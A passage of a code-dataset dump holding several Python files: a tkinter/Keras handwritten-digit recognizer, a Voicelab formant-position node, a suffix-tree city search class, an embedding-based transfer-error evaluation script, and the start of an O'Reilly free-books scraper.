_FindDuplicateKeysWithPathInList(itertools.groupby(indexedFlattenedData, key=lambda x: _GetKeyFromOffsetData(x)))\n if len(d) > 0:\n indexedDuplicateData[nestedIndexId] = d\n\n return indexedDuplicateData\n\n\ndef _FlattenOffsetData(indexedOffsetDataObject):\n flattenedDict = {}\n dataStack = [indexedOffsetDataObject]\n startTime = time.time()\n while len(dataStack) != 0:\n data = dataStack.pop()\n if len(data.offsetData) != 0:\n _AddDataWithAddedOffsetToFlattenedDict(data.offsetData, data.offset, flattenedDict)\n if len(data.nestedIndexedOffsetDataList) != 0:\n _AddOffsetToNestedIndexedDataList(data.nestedIndexedOffsetDataList, data.offset)\n dataStack.extend(data.nestedIndexedOffsetDataList)\n\n log.info('Flattening dict took: %f s' % (time.time() - startTime))\n return flattenedDict","sub_path":"client/fsd/schemas/nestedIndexedOffsetData.py","file_name":"nestedIndexedOffsetData.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"412155660","text":"import tkinter as tk \nfrom tkinter import ttk\nimport win32gui\nfrom PIL import ImageGrab, Image\n\nfrom keras.models import load_model\nfrom keras.models import Model\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\n\nclass Recognizer:\n\tdef __init__(self, master):\n\t\t# set up for window\n\t\tself.window = master\n\t\tself.window.title('Digit recognizer')\n\t\tself.window.geometry('895x400')\n\n\t\t# load model\n\t\tself.model = load_model('mnist.h5')\n\t\t# self.model = 1\n\n\t\t# canvas to draw\n\t\tself.draw_canvas = tk.Canvas(self.window, width=280, height=280, bg='black', cursor='circle')\n\t\tself.old_x = None\n\t\tself.old_y = None\n\n\t\t# canvas to show probabilites\n\t\tself.proba_canvas = tk.Canvas(self.window, width=600, height=280, bg='white')\n\n\t\t# button\n\t\tself.clear_button = tk.Button(self.window, text='Clear', font=('Helvetica', 15), width=8, state='disabled', command=self.clear)\n\t\tself.predict_button = tk.Button(self.window, text='Predict', font=('Helvetica', 15), width=8, state='disabled', command=self.draw_prob)\n\t\tself.visualize_button = tk.Button(self.window, text='Visualize outputs of each layers',font=('Helvetica', 15), width=25, state='disabled', command=self.visualize)\n\n\t\t# label\n\t\tself.predict_label = tk.Label(self.window, text='', font=('Helvetica', 15))\n\n\n\t\t# grid system\n\t\tself.draw_canvas.grid(row=0, column=0, columnspan=2)\n\t\tself.proba_canvas.grid(row=0, column=2, columnspan=10, stick='ew')\n\n\t\tself.clear_button.grid(row=1, column=0, pady=5)\n\t\tself.predict_button.grid(row=1, column=1, pady=5)\n\t\tself.visualize_button.grid(row=2, column=0, columnspan=2, padx=3)\n\n\t\tself.predict_label.grid(row=3, column=2, columnspan=10)\n\n\t\t# bind draw_canvas\n\t\tself.draw_canvas.bind('', self.draw_digit)\n\t\tself.draw_canvas.bind('', self.reset_xy)\n\n\t\t# label for digits\n\t\tself.create_digit_label()\n\n\tdef create_digit_label(self):\n\t\td0_label = tk.Label(self.window, text='0', font=('Helvetica', 15))\n\t\td1_label = tk.Label(self.window, text='1', font=('Helvetica', 15))\n\t\td2_label = tk.Label(self.window, text='2', font=('Helvetica', 15))\n\t\td3_label = tk.Label(self.window, text='3', font=('Helvetica', 15))\n\t\td4_label = tk.Label(self.window, text='4', font=('Helvetica', 15))\n\t\td5_label = tk.Label(self.window, text='5', font=('Helvetica', 15))\n\t\td6_label = tk.Label(self.window, text='6', font=('Helvetica', 15))\n\t\td7_label = tk.Label(self.window, text='7', font=('Helvetica', 15))\n\t\td8_label = tk.Label(self.window, text='8', font=('Helvetica', 15))\n\t\td9_label = tk.Label(self.window, text='9', font=('Helvetica', 15))\n\n\t\tdiagram_label = tk.Label(self.window, text='Probability histogram', font=('Helvetica', 15))\n\n\t\td0_label.grid(row=1, column=2)\n\t\td1_label.grid(row=1, column=3)\n\t\td2_label.grid(row=1, column=4)\n\t\td3_label.grid(row=1, column=5)\n\t\td4_label.grid(row=1, column=6)\n\t\td5_label.grid(row=1, column=7)\n\t\td6_label.grid(row=1, column=8)\n\t\td7_label.grid(row=1, column=9)\n\t\td8_label.grid(row=1, column=10)\n\t\td9_label.grid(row=1, column=11)\n\n\t\tdiagram_label.grid(row=2, column=2, columnspan=10)\n\n\tdef draw_digit(self, event):\n\t\tif(self.old_x and self.old_y):\n\t\t\tself.draw_canvas.create_line(self.old_x, self.old_y, event.x, event.y, fill='white', width=15, capstyle='round', smooth=True)\n\n\t\tself.old_x = event.x \n\t\tself.old_y = event.y\n\n\t\tif(self.old_x != None and self.old_y != None):\n\t\t\tself.predict_button.configure(state='normal')\n\t\t\tself.clear_button.configure(state='normal')\n\n\tdef reset_xy(self, event):\n\t\tself.old_x = None\n\t\tself.old_y = None\n\n\tdef clear(self):\n\t\tself.draw_canvas.delete('all')\n\t\tself.proba_canvas.delete('all')\n\n\t\tself.predict_label.configure(text='')\n\n\t\tself.predict_button.configure(state='disabled')\n\t\tself.clear_button.configure(state='disabled')\n\t\tself.visualize_button.configure(state='disabled')\n\n\tdef get_image(self):\n\t\tHWND = self.draw_canvas.winfo_id()\n\t\trect = win32gui.GetWindowRect(HWND)\n\t\timg = ImageGrab.grab(rect)\n\n\t\timg = img.resize((28, 28))\n\t\timg = img.convert('L') # convert to grayscale\n\t\timg = np.array(img)\n\t\timg = img.reshape((1, 28, 28, 1))\n\t\timg = img / 255.\n\n\t\treturn img \n\n\tdef predict(self, img):\n\t\tprob = self.model.predict([img])[0]\n\t\tdigit = np.argmax(prob)\n\n\t\treturn prob, digit \n\n\n\tdef draw_prob(self):\n\t\timg = self.get_image()\n\t\tprob, digit = self.predict(img)\n\n\t\tself.predict_label.configure(text=\"Predict: \" + str(digit))\n\n\t\t# look up prob_canvas_coordinates.png to know how to caculate coordinates\n\n\t\t# for digit 0\n\t\tx1, y1 = 45, 280\n\t\tx2, y2 = x1 - 30, 280 - (280 * prob[0])\n\t\tif(digit == 0):\n\t\t\tself.proba_canvas.create_rectangle(x1, y1, x2, y2, fill='green')\n\t\telse:\n\t\t\tself.proba_canvas.create_rectangle(x1, y1, x2, y2, fill='blue')\n\t\tif(y2 < 18):\n\t\t\tself.proba_canvas.create_text(x1 - 15, y2 + 10, font=('Helvetica', 10), text='{0:.2f}'.format(prob[0]), fill='white')\n\t\telse:\n\t\t\tself.proba_canvas.create_text(x1 - 15, y2 - 10, font=('Helvetica', 10), text='{0:.2f}'.format(prob[0]), fill='black')\n\n\t\t# for onthers digit\n\t\tfor i in range(1, 10):\n\t\t\tx1, y1 = x1 + 60, 280\n\t\t\tx2, y2 = x1 - 30, 280 - (280 * prob[i])\n\t\t\tif(digit == i):\n\t\t\t\tself.proba_canvas.create_rectangle(x1, y1, x2, y2, fill='green')\n\t\t\telse:\n\t\t\t\tself.proba_canvas.create_rectangle(x1, y1, x2, y2, fill='blue')\n\t\t\tif(y2 < 18):\n\t\t\t\tself.proba_canvas.create_text(x1 - 15, y2 + 10, font=('Helvetica', 10), text='{0:.2f}'.format(prob[i]), fill='white')\n\t\t\telse:\n\t\t\t\tself.proba_canvas.create_text(x1 - 15, y2 - 10, font=('Helvetica', 10), text='{0:.2f}'.format(prob[i]), fill='black')\n\n\t\t# state of buttons after click predict button\n\n\t\tself.predict_button.configure(state='disabled')\n\t\tself.visualize_button.configure(state='normal')\n\n\tdef visualize(self):\n\t\ttop_level = tk.Toplevel()\n\t\timg = self.get_image()\n\n\t\tVisualize(top_level, self.model, img)\n\n\nclass Visualize:\n\tdef __init__(self, master, model, img):\n\t\tself.top_level = master\n\t\tself.top_level.title('Visualize outputs of each layers')\n\t\tself.top_level.geometry('1170x550')\n\t\tself.model = model\n\t\tself.img = img.reshape(28, 28, 1)\n\n\t\tself.window = self.create_frame_scrollbar(self.top_level) \n\t\tself.frame_for_conv2d_0 = self.create_frame_scrollbar(root=self.window, row=1, column=1, width=180, height=450)\n\t\tself.frame_for_conv2d_1 = self.create_frame_scrollbar(root=self.window, row=1, column=2, width=180, height=450)\n\t\tself.frame_for_max_pooling2d_0 = self.create_frame_scrollbar(root=self.window, row=1, column=3, width=180, height=450)\n\t\tself.frame_for_dense_0 = self.create_frame_scrollbar(root=self.window, row=1, column=4, width=120, height=450)\n\t\tself.frame_for_dense_1 = self.create_frame_scrollbar(root=self.window, row=1, column=5, width=120, height=450)\n\n\t\tself.create_labels()\n\n\t\tself.visualize_layer_output()\n\n\tdef create_frame_scrollbar(self, root, row=None, column=None, width=None, height=None, padx=None, pady=None, background=None):\n\t\tmain_frame = tk.Frame(root)\n\n\t\tcanvas = tk.Canvas(main_frame, width=width, height=height, bg=background)\n\n\t\tvscrollbar = ttk.Scrollbar(main_frame, orient='vertical', command=canvas.yview)\n\t\tvscrollbar.pack(side='right', fill='y')\n\t\tcanvas.pack(side='left', fill='both', expand=1)\n\t\tcanvas.configure(yscrollcommand=vscrollbar.set)\n\n\t\tif(row != None and column != None):\n\t\t\tmain_frame.grid(row=row, column=column, padx=padx, pady=pady)\n\t\telse:\n\t\t\tmain_frame.pack(fill='both', expand=1)\n\t\t\thscrollbar = ttk.Scrollbar(main_frame, orient='horizontal', command=canvas.xview)\n\t\t\thscrollbar.pack(side='bottom', fill='x')\n\t\t\tcanvas.pack(side='top', fill='both', expand=1)\n\t\t\tcanvas.configure(xscrollcommand=hscrollbar.set)\n\n\n\t\tcanvas.bind('', lambda e: canvas.configure(scrollregion=canvas.bbox('all')))\n\n\t\tframe = tk.Frame(canvas)\n\n\t\tcanvas.create_window((0,0), window=frame, anchor='nw')\n\n\t\treturn frame\n\n\tdef create_labels(self):\n\t\tlabel_0 = tk.Label(self.window, text='Input: 28x28', font=('Helvetica', 10))\n\t\tlabel_1 = tk.Label(self.window, text='Conv2d_0: 24x24 ', font=('Helvetica', 10))\n\t\tlabel_2 = tk.Label(self.window, text='Conv2d_1: 12x12 ', font=('Helvetica', 10))\n\t\tlabel_3 = tk.Label(self.window, text='Max_pooling2d_0: 12x12 ', font=('Helvetica', 10))\n\t\tlabel_4 = tk.Label(self.window, text='Dense_0: 1x1 ', font=('Helvetica', 10))\n\t\tlabel_5 = tk.Label(self.window, text='Dense_1: 1x1 ', font=('Helvetica', 10))\n \n\t\tlabel_0.grid(row=0, column=0, pady=15)\n\t\tlabel_1.grid(row=0, column=1, pady=15)\n\t\tlabel_2.grid(row=0, column=2, pady=15)\n\t\tlabel_3.grid(row=0, column=3, pady=15)\n\t\tlabel_4.grid(row=0, column=4, pady=15)\n\t\tlabel_5.grid(row=0, column=5, pady=15)\n\n\tdef get_layer_ouput(self):\n\t\timg = self.img.reshape(1, 28, 28, 1)\n\t\tconv2d_0 = Model(inputs=self.model.input, outputs=self.model.get_layer(index=0).output)\n\t\tconv2d_1 = Model(inputs=self.model.input, outputs=self.model.get_layer(index=1).output)\n\t\tmax_pooling2d_0 = Model(inputs=self.model.input, outputs=self.model.get_layer(index=2).output)\n\t\tdense_0 = Model(inputs=self.model.input, outputs=self.model.get_layer(index=5).output)\n\t\tdense_1 = Model(inputs=self.model.input, outputs=self.model.get_layer(index=7).output)\n\t\n\t\tconv2d_0_output = conv2d_0.predict(img)[0]\n\t\tconv2d_1_output = conv2d_1.predict(img)[0]\n\t\tmax_pooling2d_0_output = max_pooling2d_0.predict(img)[0]\n\t\tdense_0_output = dense_0.predict(img)[0].reshape(1, 1, -1)\n\t\tdense_1_output = dense_1.predict(img)[0].reshape(1, 1, -1)\n\n\t\treturn (conv2d_0_output, conv2d_1_output, max_pooling2d_0_output, dense_0_output, dense_1_output)\n\n\tdef imshow_img(self, root, figsize, dpi=None, layer_output=None, name=None, row=None, column=None, padx=None, pady=None, background=None):\n\t\tif(layer_output is None):\n\t\t\tfig = Figure(figsize=figsize, dpi=dpi, tight_layout={'pad':0})\n\n\t\t\tax = fig.add_subplot(111)\n\t\t\tax.imshow(self.img, cmap='gray', vmin=0, vmax=1) \n\n\t\t\tax.axes.get_xaxis().set_visible(False)\n\t\t\tax.axes.get_yaxis().set_visible(False)\n\n\t\t\tcanvas = FigureCanvasTkAgg(fig, master=root)\n\t\t\tcanvas.get_tk_widget().grid(row=row, column=column, padx=padx, pady=pady)\n\t\telse:\n\t\t\tm, n, c = layer_output.shape \n\t\t\tprint(m, n, c)\n\t\t\tfig, ax = plt.subplots(nrows=c, ncols=1, figsize=figsize, dpi=dpi)\n\t\t\tfor i in range(c):\n\t\t\t ax[i].imshow(layer_output[:,:,i].reshape(m, n, 1), cmap='gray', vmin=0, vmax=1)\n\t\t\t ax[i].axes.get_xaxis().set_visible(False)\n\t\t\t ax[i].axes.get_yaxis().set_visible(False)\n\t\t\t ax[i].set_title(str(i), fontsize=10)\n\t\t\t print(name + '[{}]: done'.format(i))\n\t\t\tfig.set_facecolor(background)\n\t\t\tfig.tight_layout()\n\n\t\t\tcanvas = FigureCanvasTkAgg(fig, master=root) \n\t\t\tcanvas.get_tk_widget().pack()\n\n\tdef visualize_layer_output(self):\n\t\tself.imshow_img(root=self.window, figsize=(2, 2), dpi=100, row=1, column=0, padx=15, pady=15)\n\n\t\tconv2d_0_output, conv2d_1_output, max_pooling2d_0_output, dense_0_output, dense_1_output = self.get_layer_ouput()\n\n\t\tself.imshow_img(root=self.frame_for_conv2d_0, figsize=(1.85, 60), layer_output=conv2d_0_output, name='conv2d_0', background='red')\n\t\tself.imshow_img(root=self.frame_for_conv2d_1, figsize=(1.85, 120), layer_output=conv2d_1_output, name='conv2d_1', background='green')\n\t\tself.imshow_img(root=self.frame_for_max_pooling2d_0, figsize=(1.85, 120), layer_output=max_pooling2d_0_output, name='max_pooling2d_0', background='blue')\n\t\tself.imshow_img(root=self.frame_for_dense_0, figsize=(1.3, 250), layer_output=dense_0_output, name='dense_0', background='yellow')\n\t\tself.imshow_img(root=self.frame_for_dense_1, figsize=(1.3, 10), layer_output=dense_1_output, name='dense_1', background='purple')\n\n\nroot = tk.Tk()\nRecognizer(master=root)\nroot.mainloop()\n\n\n\n","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":11561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"86552960","text":"from Voicelab.pipeline.Node import Node\nfrom parselmouth.praat import call\nfrom Voicelab.toolkits.Voicelab.VoicelabNode import VoicelabNode\nfrom Voicelab.toolkits.Voicelab.MeasurePitchNode import measure_pitch\nfrom scipy import stats\nimport statistics\n\n\nclass MeasureFormantPositionsNode(VoicelabNode):\n def __init__(self, *args, **kwargs):\n \"\"\"\n Args:\n *args:\n **kwargs:\n \"\"\"\n super().__init__(*args, **kwargs)\n\n self.args = {\n # 'Method': 'formants_praat_manual'\n }\n\n self.state = {\n \"f1_mean_pf_list\": [],\n \"f2_mean_pf_list\": [],\n \"f3_mean_pf_list\": [],\n \"f4_mean_pf_list\": [],\n #'f1_median_pf_list': [],\n #'f2_median_pf_list': [],\n #'f3_median_pf_list': [],\n #'f4_median_pf_list': [],\n }\n\n # On each file we want to calculate the formants at the glottal pulses\n def process(self):\n\n voice: object = self.args[\"voice\"]\n\n # method = self.args['Method']\n # pitch = self.args['Pitch']\n formant_object = self.args[\"Formants\"]\n\n pitch_floor = self.args[\"Pitch Floor\"]\n pitch_ceiling = self.args[\"Pitch Ceiling\"]\n pitch = measure_pitch(\n voice=voice, measure=\"cc\", floor=pitch_floor, ceiling=pitch_ceiling\n )\n\n point_process = call(\n [voice, pitch], \"To PointProcess (cc)\"\n ) # Create PointProcess object\n num_points = call(point_process, \"Get number of points\")\n\n f1_list = []\n f2_list = []\n f3_list = []\n f4_list = []\n measurement_times = []\n\n for point in range(0, num_points):\n point += 1\n t = call(point_process, \"Get time from index\", point)\n measurement_times.append(t)\n f1 = call(formant_object, \"Get value at time\", 1, t, \"Hertz\", \"Linear\")\n f2 = call(formant_object, \"Get value at time\", 2, t, \"Hertz\", \"Linear\")\n f3 = call(formant_object, \"Get value at time\", 3, t, \"Hertz\", \"Linear\")\n f4 = call(formant_object, \"Get value at time\", 4, t, \"Hertz\", \"Linear\")\n f1_list.append(f1)\n f2_list.append(f2)\n f3_list.append(f3)\n f4_list.append(f4)\n\n f1_list = [f1 for f1 in f1_list if str(f1) != \"nan\"]\n f2_list = [f2 for f2 in f2_list if str(f2) != \"nan\"]\n f3_list = [f3 for f3 in f3_list if str(f3) != \"nan\"]\n f4_list = [f4 for f4 in f4_list if str(f4) != \"nan\"]\n\n # calculate mean & median formants across pulses\n if len(f1_list) > 0:\n f1_mean_pf = sum(f1_list) / len(f1_list)\n # f1_median_pf = statistics.median(f1_list)\n else:\n f1_mean_pf = \"N/A\"\n f1_median_pf = \"N/A\"\n\n if len(f2_list) > 0:\n f2_mean_pf = sum(f2_list) / len(f2_list)\n f2_median_pf = statistics.median(f2_list)\n else:\n f2_mean_pf = \"N/A\"\n f2_median_pf = \"N/A\"\n\n if len(f3_list) > 0:\n f3_mean_pf = sum(f3_list) / len(f3_list)\n f3_median_pf = statistics.median(f3_list)\n else:\n f3_mean_pf = \"N/A\"\n f3_median_pf = \"N/A\"\n\n if len(f4_list) > 0:\n f4_mean_pf = sum(f4_list) / len(f4_list)\n f4_median_pf = statistics.median(f4_list)\n else:\n f4_mean_pf = \"N/A\"\n f4_median_pf = \"N/A\"\n\n results = {}\n\n # collect all means and median values, these will be needed at the end to calculate the formant positions\n self.state[\"f1_mean_pf_list\"].append(f1_mean_pf)\n self.state[\"f2_mean_pf_list\"].append(f2_mean_pf)\n self.state[\"f3_mean_pf_list\"].append(f3_mean_pf)\n self.state[\"f4_mean_pf_list\"].append(f4_mean_pf)\n\n self.state[\"f1_median_pf_list\"].append(f1_median_pf)\n self.state[\"f2_median_pf_list\"].append(f2_median_pf)\n self.state[\"f3_median_pf_list\"].append(f3_median_pf)\n self.state[\"f4_median_pf_list\"].append(f4_median_pf)\n\n return results\n\n # Once all of the files have been processed, we want to calculate the position accross all of them\n def end(self, results):\n\n \"\"\"\n Args:\n results:\n \"\"\"\n f1_mean_pf_list = self.state[\"f1_mean_pf_list\"]\n f2_mean_pf_list = self.state[\"f2_mean_pf_list\"]\n f3_mean_pf_list = self.state[\"f3_mean_pf_list\"]\n f4_mean_pf_list = self.state[\"f4_mean_pf_list\"]\n\n f1_median_pf_list = self.state[\"f1_median_pf_list\"]\n f2_median_pf_list = self.state[\"f2_median_pf_list\"]\n f3_median_pf_list = self.state[\"f3_median_pf_list\"]\n f4_median_pf_list = self.state[\"f4_median_pf_list\"]\n\n formant_mean_lists = [\n f1_mean_pf_list,\n f2_mean_pf_list,\n f3_mean_pf_list,\n f4_mean_pf_list,\n ]\n formant_median_lists = [\n f1_median_pf_list,\n f2_median_pf_list,\n f3_median_pf_list,\n f4_median_pf_list,\n ]\n\n # append it to the results of all of them\n formant_positions = self.calculate_formant_position(formant_mean_lists)\n for i, result in enumerate(results):\n if isinstance(formant_positions, str):\n results[i][self][\"Formant Position\"] = formant_positions\n else:\n results[i][self][\"Formant Position\"] = float(formant_positions[i])\n\n return results\n\n # to calcualte the formant position we need the formants at glotal pulses for each file we rans\n def calculate_formant_position(self, formant_mean_lists, formant_median_lists):\n \"\"\"\n Args:\n formant_mean_lists:\n formant_median_lists:\n \"\"\"\n if len(formant_mean_lists[0]) < 30: # or len(formant_medians_lists[0]) < 8:\n return \"Not enough samples, requires at least 30\"\n\n # Normality test for mean data\n _, p_f1_mean = stats.normaltest(formant_mean_lists[0])\n _, p_f2_mean = stats.normaltest(formant_mean_lists[1])\n _, p_f3_mean = stats.normaltest(formant_mean_lists[2])\n _, p_f4_mean = stats.normaltest(formant_mean_lists[3])\n if p_f1_mean >= 0.5 or p_f2_mean >= 0.5 or p_f3_mean >= 0.5 or p_f4_mean >= 0.5:\n return \"formants not normally distributed\"\n\n else:\n zf1_mean = stats.zscore(formant_mean_lists[0])\n zf2_mean = stats.zscore(formant_mean_lists[1])\n zf3_mean = stats.zscore(formant_mean_lists[2])\n zf4_mean = stats.zscore(formant_mean_lists[3])\n pf_mean = (zf1_mean + zf2_mean + zf3_mean + zf4_mean) / 4\n return pf_mean\n\n # normality test for median data\n _, p_f1_median = stats.normaltest(formant_medians_lists[0])\n _, p_f2_median = stats.normaltest(formant_medians_lists[1])\n _, p_f3_median = stats.normaltest(formant_medians_lists[2])\n _, p_f4_median = stats.normaltest(formant_medians_lists[3])\n\n if (\n p_f1_median >= 0.5\n or p_f2_median >= 0.5\n or p_f3_median >= 0.5\n or p_f4_median >= 0.5\n ):\n return \"formants not normally distributed\"\n\n else:\n zf1_median = stats.zscore(formant_medians_lists[0])\n zf2_median = stats.zscore(formant_medians_lists[1])\n zf3_median = stats.zscore(formant_medians_lists[2])\n zf4_median = stats.zscore(formant_medians_lists[3])\n\n pf_median = (zf1_median + zf2_median + zf3_median + zf4_median) / 4\n return pf_median\n","sub_path":"Voicelab/toolkits/Voicelab/MeasureFormantPositionsNode.py","file_name":"MeasureFormantPositionsNode.py","file_ext":"py","file_size_in_byte":7628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"182820330","text":"\"\"\"\nSuffix tree creation and usage methods\n\"\"\"\n\nfrom collections import defaultdict\nimport os\nimport suffixtree as st\nfrom src.utils.format_helper import clean_input_line, normalize_input\n\n\nclass SuffixTree:\n COLUMN_ID = \"name\"\n ROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n DATA_FILEPATH = os.path.join(ROOT_DIR, \"../../data/cities_canada-usa.tsv\")\n\n def __init__(self):\n \"\"\"Creates suffix tree in O(n) for n number of string for constant-sized alphabets, O(1) for insertion in\n hashmap \"\"\"\n self.tree = st.SuffixTree(True, [])\n self.children = defaultdict(list)\n\n with open(self.DATA_FILEPATH, 'r', encoding='utf8') as file:\n column_names = clean_input_line(next(file))\n raw_inputs = [dict(zip(column_names, clean_input_line(line))) for line in file]\n\n for child in raw_inputs:\n self.tree.addStrings([normalize_input(child[self.COLUMN_ID])])\n self.children[normalize_input(child[self.COLUMN_ID])].append(child)\n self.tree = self.tree.createQueryTree()\n self.tree.cacheNodes()\n\n def search(self, key):\n \"\"\"Returns tree dictionary and list of selected cities according to key parameter. Search is O(m),\n for m length of key \"\"\"\n selected_cities = set(self.tree.findString(key)) if len(key) > 0 else []\n return self.children, selected_cities\n","sub_path":"src/utils/suffix_tree.py","file_name":"suffix_tree.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"90479695","text":"#!/usr/bin/env python\n\n# Copyright 2017-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"). You\n# may not use this file except in compliance with the License. A copy of\n# the License is located at\n#\n# http://aws.amazon.com/apache2.0/\n#\n# or in the \"license\" file accompanying this file. This file is\n# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. See the License for the specific\n# language governing permissions and limitations under the License.\n\nimport os\nfrom copy import deepcopy\nimport json\nimport sys\nfrom io import BytesIO\nimport argparse\nimport numpy as np\nfrom matplotlib.offsetbox import OffsetImage, AnnotationBbox\nfrom scipy.cluster import hierarchy\nfrom scipy.spatial.distance import squareform, pdist\nimport pickle\nimport task_similarity\nimport glob\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pickle\n\nCUB = 'CUB'\nINAT = 'iNat'\nCUB_NUM_TASKS = 25\nADDITIONAL_TAXONOMY_DATA = [\n {\n 'kingdom': 'Animalia ',\n 'supercategory': 'Animalia ',\n 'phylum': 'Chordata',\n 'class': 'Aves',\n 'order': 'Apodiformes',\n }\n]\n\n\nCATEGORIES_JSON_FILE = 'inat2018/categories.json'\n\nparser = argparse.ArgumentParser(description='PyTorch ImageNet Training')\nparser.add_argument('--cub-root', type=str)\nparser.add_argument('--inat-root', type=str)\nparser.add_argument('--data-root', type=str, default='/data')\nparser.add_argument('--distance', default='cosine', type=str,\n help='distance to use')\nargs = parser.parse_args()\n\ndef add_class_information(embeddings):\n # load taxonomy\n with open(os.path.join(args.data_root, CATEGORIES_JSON_FILE), 'r') as f:\n categories = json.load(f)\n categories.extend(ADDITIONAL_TAXONOMY_DATA)\n\n category_map = {c['order']: c for c in categories}\n category_map.update({c['family']: c for c in categories if 'family' in c})\n\n for e in embeddings:\n try:\n c = category_map[e.task_name]\n except:\n if 'Passeriformes' in e.task_name and '_' in e.task_name:\n c = category_map[e.task_name.split('_')[1]]\n else:\n raise\n e.meta['order'] = c['order'].lower()\n e.meta['class'] = c['class'].lower()\n e.meta['phylum'] = c['phylum'].lower()\n e.meta['kingdom'] = c['kingdom'].lower()\n e.meta['supercategory'] = c['supercategory'].lower()\n\n\ndef main():\n distance_matrices = []\n names = []\n root = args.cub_root\n files = glob.glob(os.path.join(root, '*/*/*', 'embedding.p'))\n if not files: files = glob.glob(os.path.join(root, '*/*', 'embedding.p'))\n if not files: files = glob.glob(os.path.join(root, '*', 'embedding.p'))\n if not files: files = glob.glob(os.path.join(root, '*/*/*', 'features.p'))\n if not files: files = glob.glob(os.path.join(root, '*/*', 'features.p'))\n embeddings = [task_similarity.load_embedding(file) for file in files]\n embeddings.sort(key=lambda x: x.meta['dataset']['task_id'])\n first_embeddings = deepcopy(embeddings[:25])\n\n root = args.inat_root\n files = glob.glob(os.path.join(root, '*/*/*', 'embedding.p'))\n if not files: files = glob.glob(os.path.join(root, '*/*', 'embedding.p'))\n if not files: files = glob.glob(os.path.join(root, '*/*/*', 'features.p'))\n if not files: files = glob.glob(os.path.join(root, '*/*', 'features.p'))\n # get embeddings\n embeddings = [task_similarity.load_embedding(file) for file in files]\n embeddings.sort(key=lambda x: x.meta['dataset']['task_id'])\n second_embeddings = deepcopy(embeddings[25:])\n embeddings = first_embeddings + second_embeddings\n assert(len(embeddings)==50)\n for e in embeddings:\n e.task_id = e.meta['dataset']['task_id']\n e.task_name = e.meta['task_name']\n e.dataset = CUB if e.task_id < CUB_NUM_TASKS else INAT\n add_class_information(embeddings)\n\n task_id_to_name = {e.task_id:e.task_name for e in embeddings}\n distance_matrix = task_similarity.pdist(embeddings, distance=args.distance)\n embeddings = np.array(embeddings)\n np.fill_diagonal(distance_matrix, 0.)\n distance_matrix = distance_matrix[:25, :50]\n new_names = [f\"[{e.dataset}] {e.task_name} ({e.meta['class']})\" if 'order' in e.meta\n else f\"[{e.dataset}] {e.task_name} ({e.meta['class']})\" for e in embeddings]\n new_names = [s.replace('Passeriformes_', '') for s in new_names]\n names = [n.lower() for n in new_names]\n error_mat = np.load('npy/breast_pattern_errs.npy')\n errors = { target_name:{source_name:error_mat[j][i] for j,source_name in enumerate(names)} for i,target_name in enumerate(names[:25])}\n for k,v in errors.items():\n optimal_err = np.inf\n for source_name, source_err in v.items():\n if source_name==k: continue\n else:\n optimal_err = min(optimal_err, source_err)\n errors[k]['optimal'] = optimal_err\n selected_errors = []\n optimal_errors = []\n random_errors = []\n closest_distances = []\n selected_experts = []\n self_errors = []\n for name_i, (distances, name) in enumerate(zip(distance_matrix, names)):\n distances[name_i] = 10e6\n closest_i = np.argmin(distances)\n closest_distances.append((name, distances[closest_i]))\n optimal_error = float(errors[name]['optimal'])\n selected_error = errors[name][names[closest_i]]\n random_error = np.average([errors[name][source] for source in names if source!=name])\n selected_errors.append(selected_error)\n random_errors.append(random_error)\n optimal_errors.append(optimal_error)\n self_errors.append(errors[name][name])\n selected_experts.append(closest_i)\n err_types = ['t2v', 'opt', 'rand', 'self']\n for err_list, err_type in zip((selected_errors, optimal_errors, random_errors, self_errors), err_types):\n print(\"Average Relative (per-task) Error\")\n print(err_type, average_relative_error(err_list, optimal_errors))\n\n\ndef average_relative_error(err_list, opt_list):\n return np.average(100 * (np.array(err_list) - np.array(opt_list)) / np.array(opt_list))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"accuracy_embeddings_cub_attributes.py","file_name":"accuracy_embeddings_cub_attributes.py","file_ext":"py","file_size_in_byte":6309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"566795300","text":"# Copyright 2017 Erik Jhordan Rey.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\nsys.path.insert(0, 'libs')\nimport logging\nimport json as simplejson\nfrom bs4 import BeautifulSoup\nfrom google.appengine.api import urlfetch\nimport webapp2\n\nclass MainHandler(webapp2.RequestHandler):\n\n global OREILLY_FREE_BOOKS_URL\n OREILLY_FREE_BOOKS_URL = \"http://www.oreilly.com/programming/free/\"\n global OREILLY_FREE_BOOKS_PAGE\n OREILLY_FREE_BOOKS_PAGE = urlfetch.fetch(OREILLY_FREE_BOOKS_URL, deadline=90).content\n global OREILLY_FREE_BOOKS_SECTIONS_SIZE\n OREILLY_FREE_BOOKS_SECTIONS_SIZE = 2\n\n def get(self):\n\n oreilly_page = BeautifulSoup(OREILLY_FREE_BOOKS_PAGE)\n\n oreilly_json = []\n sub_category_json = []\n books_download_json = []\n books_json = []\n\n divs_book_section = oreilly_page.findAll(\"div\", {\"class\":\"callout-row\"});\n\n for sections, div_book_section in enumerate(divs_book_section):\n\n if sections <= 